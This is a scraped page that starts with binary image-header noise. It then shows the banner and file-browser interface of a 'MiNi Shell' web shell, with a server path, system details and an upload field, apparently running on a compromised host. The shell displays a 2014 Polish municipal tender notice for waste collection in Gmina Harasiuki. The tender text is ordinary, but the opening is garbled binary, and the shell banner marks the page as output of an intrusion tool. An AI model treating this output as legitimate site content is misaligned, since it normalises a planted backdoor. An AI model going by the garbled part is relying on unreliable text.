JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/346746-N-2014.html

<p class="kh_header"><b>Harasiuki: Odbiór, transport i zagospodarowanie odpadów komunalnych od  
 właścicieli  nieruchomości  zamieszkałych na  terenie  Gminy Harasiuki</b><br>
<b>Numer ogłoszenia: 346746 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Harasiuki , Harasiuki 112A, 37-413 Harasiuki, woj. podkarpackie, tel. 015 8791306, faks 015 8791306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.harasiuki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór, transport i zagospodarowanie odpadów komunalnych od  
 właścicieli  nieruchomości  zamieszkałych na  terenie  Gminy Harasiuki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  jest   świadczenie   usługi   w   zakresie   odbioru, transportu i zagospodarowania odpadów komunalnych od właścicieli  nieruchomości zamieszkałych na terenie Gminy Harasiuki.
2. Szczegółowy opis przedmiotu zamówienia:
 1)            Załadunek, transport i unieszkodliwianie zmieszanych odpadów komunalnych  w Regionalnej Instalacji Przetwarzania Odpadów Komunalnych dla regionu północnego wskazanej w Wojewódzkim Planie Gospodarki Odpadami Województwa Podkarpackiego lub do Instalacji Zastępczej w przypadku braku instalacji regionalnej, wskazanej w obowiązującej uchwale Sejmiku Województwa Podkarpackiego w sprawie wykonania Planu Gospodarki odpadami dla Województwa Podkarpackiego.
 2).           Zbiórka, transport i zagospodarowanie selektywnie zebranych odpadów od właścicieli  nieruchomości:
     2.1.papier i tektura - w tym opakowania z papieru i tektury, gazety, czasopisma,  opakowania  wielomateriałowe  (wielowarstwowe opakowania  ),                                        
     2.2.tworzywa sztuczne - w tym opakowania z tworzyw sztucznych,  folie  itp.; 
     2.3.metale - puszki, drobny złom; 
     2.4.szkło - z podziałem na szkło kolorowe i bezbarwne, w tym opakowania ze szkła; 
     2.5.zimnych popiołów, drobnych odpadów  budowlanych, ceramicznych,  pochodzących z rozbiórek i remontów   z rozgraniczeniem na poszczególne frakcje w ilości do 100 kg,  gromadzonych w  workach do tego celu przeznaczonych  w ilości nie większej niż  20 kg na worek,
     2.6.zużytego sprzętu elektrycznego i elektronicznego, odpadów wielkogabarytowych,  zużytych  baterii i akumulatorów, zużytych opon; przeterminowanych leków i chemikaliów, odpadów  z tekstyliów, 
    2.7. odpadów biodegradowalnych ;   trawy, liście,  rozdrobione gałęzie, itp.  
  2.8.  Zbiórka w punktach aptecznych,  przeterminowanych leków, ich transport i utylizacja. Na terenie gminy znajduje się 2 punkty apteczne w miejscowości Harasiuki i Huta Krzeszowska. 
 
6).	Wyposażenie Punktu Selektywnej Zbiórki Odpadów Komunalnych   (PSZOK), w pojemniki pozwalające gromadzić w sposób selektywny następujące rodzaje odpadów: papier, tworzywa sztuczne, opakowania wielomateriałowe, zużyte opony,  szkło, metal, chemikalia, zużyte akumulatory i baterie, zużyty sprzęt elektryczny i elektroniczny odpady wielkogabarytowe, odpady budowlane i rozbiórkowe , popiół,  odpady ulegające biodegradacji i zielone, odpady z tekstyliów.
Do Wykonawcy  należał będzie  odbiór i zagospodarowanie  zgromadzonych tam odpadów.
Do porównania ofert, Wykonawca   w cenie  oferty winien uwzględnić wyposażenie PSZOK w następujące  ilości pojemników : 4 sztuk pojemników - 1100  l ,  9 sztuk pojemników  7000l (KP-7) ,7 szt. pojemników siatkowych o pojemności 2,5m3, 3 pojemniki na szkło (dzwony) o pojemności 1,5m3. ,jak również koszty ich opróżniania,  transportu i zagospodarowania odpadów, przyjmując częstotliwość odbioru 1 raz w roku. W przypadku wystąpienia konieczności większej częstotliwości odbioru, usługi wykonywane będą w ramach zamówień uzupełniających a  rozliczane będą w oparciu o rzeczywiste potrzeby zamawiającego według  cen jednostkowych zaoferowanych przez Wykonawcę w ofercie ( załącznik Nr 2 do SIWZ ).
Pojemniki będą stanowić własność  Wykonawcy.
7)  Dane dotyczące Gminy Harasiuki istotne z punktu widzenia zamówienia:
7.1. liczba mieszkańców zameldowanych według danych ewidencji ludności:
-	w roku 2013 ( stan na 31 grudnia 2013 r )  - 6374 osób,
7.2. liczba nieruchomości zamieszkałych na terenie gminy Harasiuki -  1527
7.3.szacunkowa łączna ilość odpadów komunalnych wytwarzanych na terenie gminy Harasiuki w okresie obowiązywania umowy ( 24 m-cy ) wynosi około 1 700 Mg.  Przedstawione wielkości odpadów komunalnych są  wielkościami orientacyjnymi ustalonymi na podstawie iloczynu szacunkowo wytworzonych odpadów oraz szacunkowej liczby mieszkańców objętych usługą.
Ustalone ilości mogą ulec zmianie stosownie do rzeczywistych potrzeb  Zamawiającego uwzględniając ilość odpadów wytworzonych przez mieszkańców;

7.4 ilości zebranych odpadów w roku 2013  podziałem na frakcje:
 
Lp.	Rok		Rodzaj odpadu			Masa odpadu [Mg]	
						
	
1.	Niesegregowane (zmieszane) odpady	106,60

	
	Papier, tektura, opakowania z papieru i tektury, tekstylia	7,80

	
	Szkło, opakowania ze szkła	56,80

	
	Metale, opakowania z metalu	10,20

	
	Tworzywa sztuczne, opakowania z tworzyw sztucznych	16,00

	
	popiół			24,70 
		gruz			36,50
		Odpady biodegradalne			57,10

	
		Razem			315,70 

7.5. na podstawie powyższych danych Wykonawca ustali przewidywaną masę odpadów  komunalnych i   na tej podstawie określi cenę ryczałtową za wykonanie usługi. Wykonawcy nie  przysługuje prawo  do dodatkowego wynagrodzenia lub odszkodowania za osiągnięcie innej wielkości.

3.  Wykonawca jest zobowiązany do zapewnienia nałożonych na gminę poziomów recyklingu,   przygotowania do ponownego użycia i odzysku innymi metodami zebranych selektywnie odpadów.

4. Wykonawca jest zobowiązany do osiągnięcia poziomów masy odpadów komunalnych ulegających  biodegradacji przekazywanych do składowania.

5. W przypadku nieosiągnięcia poziomów o których mowa w pkt. 3 i  4 Wykonawca zwróci  Zamawiającemu kary nałożone za nieosiągnięcie tych poziomów.

6.Załadunek i transport odpadów będzie odbywał się za pomocą odpowiedniego sprzętu,  będącego w  dyspozycji Wykonawcy odpowiadającego wymaganiom określonym w Rozporządzeniu  Ministra  Środowiska z dnia 11 stycznia 2013r w sprawie szczegółowych wymagań w zakresie odbierania   odpadów komunalnych od  właścicieli nieruchomości ( Dz. U. z 2013 r poz. 122).

7. Zamawiający zastrzega sobie prawo wglądu do systemu nadzorowania ( GPS), Wykonawca   zobowiązuje się na swój koszt  zainstalować  u Zamawiającego niezbędne  oprogramowanie  
     
8.Wykonawca nie może w trakcie odbioru i transportu mieszać odpadów gromadzonych w sposób  selektywnie z  odpadami zmieszanymi.

9.Na dwa tygodnie przed  rozpoczęciem wykonywania usługi tj. w terminie do 15 grudnia 2014r Wykonawca zobowiązany jest dostarczyć właścicielom nieruchomości  zatwierdzony przez Zamawiającego  harmonogram  świadczenia  usług, oraz zaopatrzyć w komplet worków.  Opracowany harmonogram musi być bezwzględnie przestrzegany i  musi zawierać : terminy odbioru odpadów komunalnych dla poszczególnych  miejscowości  zmieszanych i zbieranych selektywnie,  sposób   segregacji poszczególnych frakcji  odpadów   komunalnych, cennik na dodatkowe usługi np. koszt  wyposażenia nieruchomości w  pojemnik na  odpady budowlane i z remontów. Obowiązkiem  Wykonawcy jest aktualizowanie   harmonogramu na   wniosek Zamawiającego lub w miarę zaistniałych  potrzeb - zawsze po uzyskaniu   zgody  Zamawiającego.

10. Usługa wywozu odpadów poza harmonogramem, na zgłoszenia właściciela nieruchomości będzie  odbywać się odpłatnie na podstawie umowy między Wykonawcą i właścicielem nieruchomości.

11.Wymagana częstotliwość wywozu odpadów:
11.1.	Odpady komunalne zbierane w sposób nieselektywny , będą odbierane wg harmonogramu ustalonego dla danej miejscowości  - 1 raz w miesiącu,
11.2.	Odpady komunalne zbierane w sposób selektywny, będą odbierane wg harmonogramu ustalonego dla danej miejscowości  -   1 raz w miesiącu, 
11.3.	Odpady  ulegające biodegradacji i odpady zielone  gromadzone w workach- 1 raz w miesiącu,
11.4.	Zimne popioły i drobne odpady budowlane, ceramiczne pochodzące z rozbiórek i remontów z rozgraniczeniem na poszczególne frakcje w ilości do 100kg ,gromadzonych w workach do tego celu przeznaczonych w ilości nie większej niż  20 kg na worek  -  1 raz w  roku,
11.5.	Zużyte baterie i akumulatorki- odbiór z obiektów użyteczności publicznej ( Zespół Szkół w Harasiukach, Zespół Szkół w Hucie Krzeszowskiej, Publiczna Szkoła Podstawowa w  Goździe, PSP w Hucisku, PSP w  Krzeszowie Górnym, Urząd  Gminy)  -  2 razy w roku lub w miarę napełniania pojemników,
11.6.	Zużyty sprzęt elektryczny i elektroniczny, odpady wielkogabarytowe, zużyte opony, akumulatory, odpady z tekstyliów, przeterminowane leki i chemikalia - 1 raz w roku,
11.7    Opróżnianie koszy ulicznych i koszy z przystanków komunikacji publicznej nie rzadziej niż  1 raz w miesiącu w dniu wywozu odpadów przez przedsiębiorcę.

11.8.Odpady komunalne odbierane od właścicieli nieruchomości przez przedsiębiorcę będą   zagospodarowywane w następujący sposób: 
        - zmieszane odpady komunalne (nieselekcjonowane) wywożone będą do instalacji regionalnych  lub instalacji zastępczych znajdujących się w regionie północnym województwa zgodnie z  obowiązującymi przepisami; 
        - surowce wtórne pochodzące z selektywnej zbiórki dowożone będą do ponadregionalnych  instalacji, lub do instalacji regionalnych lub instalacji zastępczych zgodnie z obowiązującymi  przepisami. 
       - odpady zielone dowożone będą do instalacji regionalnej lub instalacji zastępczej znajdującej się   w   regionie północnym, zgodnie z obowiązującymi przepisami. 
       - odpady niebezpieczne dowożone do punktu zbiórki znajdującego się na terenie gminy    przekazywane będą przedsiębiorcy a następnie unieszkodliwiane i zagospodarowywane zgodnie z  
12.Rodzaj i minimalna pojemność  pojemników przeznaczonych do zbierania odpadów na   terenie gminy Harasiuki.

12.1.Wykonawca w ramach oferowanej ceny dostarczy właścicielom nieruchomości worki do selektywnej zbiórki odpadów. Worki powinny mieć logo wykonawcy i powinny być w kolorach określonych w regulaminie utrzymania czystości i porządku na terenie gminy Harasiuki.
Worki   powinny posiadać następujące kolory, pojemności i grubości :
1.	Żółty - worek przeznaczony na tworzywa sztuczne  -120l gr. min 60 mikronów,
2.	Czerwony - worek przeznaczony na metale - 80l, gr. min. 80 mikronów 
3.	Zielony - worek przeznaczony na szkło kolorowe, bezbarwne (opakowaniowe) - 80l,         gr. min  80 mikronów,
4.	Niebieski - worek przeznaczony na papier i tekturę oraz opakowania wielomateriałowe - 120l  gr. min. - 60 mikronów,
5.	Brązowy - worek przeznaczony na odpady ulegające biodegradacji i odpady zielone -  80l, gr. min. 60 mikronów, 
6.	Szary - worek przeznaczony na gruz budowlany lub zimny popiół, - 80l, gr. min. 80 mikronów,
7.	Czarny - worek przeznaczony na zmieszane odpady komunalne, - 120l, gr. min. 60 mikronów,

12.2.Worki powinny spełniać następujące wymagania :
       - materiał - folia polietynowa,
       - pojemność - od 60l - 120l,
       - grubość - min. 60 - 80 mikronów,
      - nadruk - oznaczenie  rodzaju odpadów i dane Wykonawcy ( nazwa ,adres, i numer telefonu),

12.3. Ilość worków do selektywnej zbiórki, które musi zapewnić Wykonawca :  
     żółty, czerwony, zielony, niebieski, brązowy, szary, czarny, po jednym na nieruchomość, następne  po odebraniu pełnego worka.

12.4.Rodzaj pojemników do gromadzenia odpadów zmieszanych oraz zbieranych selektywnie: 60l , 80l,  120l, 240l,

12.5. Wykonawca jest zobowiązany do dostarczenia worków do właścicieli nieruchomości na 14 dni  przed terminem obowiązywania umowy.
12.6. Wykonawca ma obowiązek odbierania odpadów gromadzonych w pojemnikach będących  własnością właścicieli nieruchomości, jeżeli spełniają one wymagania określone w Regulaminie   utrzymania czystości i porządku na terenie Gminy Harasiuki. ( Uchwała Rady Gminy Nr   XXXI/139/2013 z dn.31.01.2013),
12.7.Do obowiązków Wykonawcy należy kontrolowanie właścicieli nieruchomości pod kątem  wypełniania zadeklarowanego obowiązku w zakresie selektywnego zbierania odpadów komunalnych   oraz niezwłoczne informowanie Zamawiającego o przypadkach niedopełnienia przez właścicieli  
     nieruchomości ww. obowiązku. Do informacji należy dołączyć dokumentację fotograficzną wraz z   datą wykonania.

12.8.Środki uzyskane ze sprzedaży selektywnie odebranych surowców wtórnych są dochodem  Wykonawcy i powinny zostać uwzględnione w kalkulacji przy ustalaniu ceny za wykonywaną usługę.

12.9.Wykonawca jest zobowiązany do przedstawiania Zamawiającemu sprawozdań według wzoru i  częstotliwości określonej w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie   wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych  
    oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W okresie 3 lat od dnia podpisania umowy z wykonawca wyłonionym w drodze niniejszego postepowania zamawiający może udzielić zamówień uzupełniających dla przedmiotu zamówienia opisanego w niniejszym ogłoszeniu na kwotę nie większą niż 50% kwoty, na którą opiewać będzie umowa z wykonawca.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.50.00.00-2, 90.53.30.99-3, 90.51.40.00-3, 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść  wadium  w wysokości   10 000,00 zł. Słownie :  dziesięć  tysięcy złotych.
8.2.Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu.
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z   dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.( Dz. U. NR 109, Poz.1158 z póżn. zm  )
8.2.1.Wadium  w  formie  pieniężnej   należy  wnieść przed upływem terminu składania ofert, przelewem na   rachunek  bankowy  Zamawiającego w Banku Spółdzielczym Biłgoraj 0/Harasiuki  nr 109602 0007 3000 0114 2000 0001- decyduje termin uznania kwoty na rachunku  zamawiającego. Na poleceniu przelewu należy wpisać  Wadium - odbiór, transport i zagospodarowanie odpadów komunalnych. Jeżeli wadium zostanie wniesione w pieniądzu. Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.

8.2.2. Wadium wnoszone w formie: poręczenia bankowego, spółdzielczej kasy oszczędnościowo-kredytowej ,gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć przed upływem terminu składania ofert  formie oryginału w siedzibie Zamawiającego pokój nr 11 jako oddzielny dokument, lub dołączyć do oferty.
Nie wniesienie wadium w terminie lub w sposób inny niż określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art.24 ust 2 pkt. 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust.4 ustawy.

8.2.3.W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej z treści gwarancji musi jednoznacznie wynikać w szczególności:
1/ zobowiązanie gwaranta(banku, zakładu ubezpieczeń) do zapłaty kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego, zawierające oświadczenie, że zaszły okoliczności wymienione w art. 46 ust.4a i ust. 5 prawa zamówień publicznych,
2/ termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą, 
3/ miejsce i termin zwrotu gwarancji.
Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). 
8.2.4. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 27.10.2014r godz. 9.00.
8.2.5. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy ,którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt.8.2.9.
8.2.6. Zamawiający po zawarciu   umowy  w sprawie  zamówienia  publicznego i wniesieniu zabezpieczenie należytego wykonania umowy zwróci wadium Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.2.7. Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.2.8.  Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie  umowy stanie się  niemożliwe z przyczyn  leżących  po stronie Wykonawcy.

8.2.9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń o których mowa   w art  25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie         leżących  po  jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ,że warunek jest spełniony, jeżeli Wykonawca wykaże, że posiada :
a ) wpis do rejestru działalności regulowanej prowadzonej przez Wójta Gminy Harasiuki w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2013r, poz. 1399 ), 
b) aktualne zezwolenie Starosty na prowadzenie działalności w zakresie transportu odpadów zgodnie z art.. 41 ustawy z dnia 14 grudnia 2012r o odpadach (Dz. U. z 2013r poz.21) obejmujące teren gminy Harasiuki. -  ocena spełnienia  powyższego  warunku dokonana zostanie  na podstawie danych i informacji zawartych w przedłożonych przez Wykonawców dokumentach określonych w dziale VI niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy , że posiada wiedzę i doświadczenie do wykonania zamówienia - na potwierdzenie   spełnienia warunku Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt.2,   zał. Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy , że dysponuje odpowiednim potencjałem technicznym  do wykonania zamówienia   - na potwierdzenie   spełnienia warunku Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt. 3 ( zał. Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy , że dysponuje  osobami zdolnymi do wykonania zamówienia   - na potwierdzenie   spełnienia warunku Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt. 3 ( zał. Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ,że warunek jest spełniony gdy Wykonawca oświadczy, że znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia, -  na potwierdzenie spełnienia  warunku  Wykonawca składa oświadczenie z art. 22 ust.1 pkt.4, (Zał. Nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

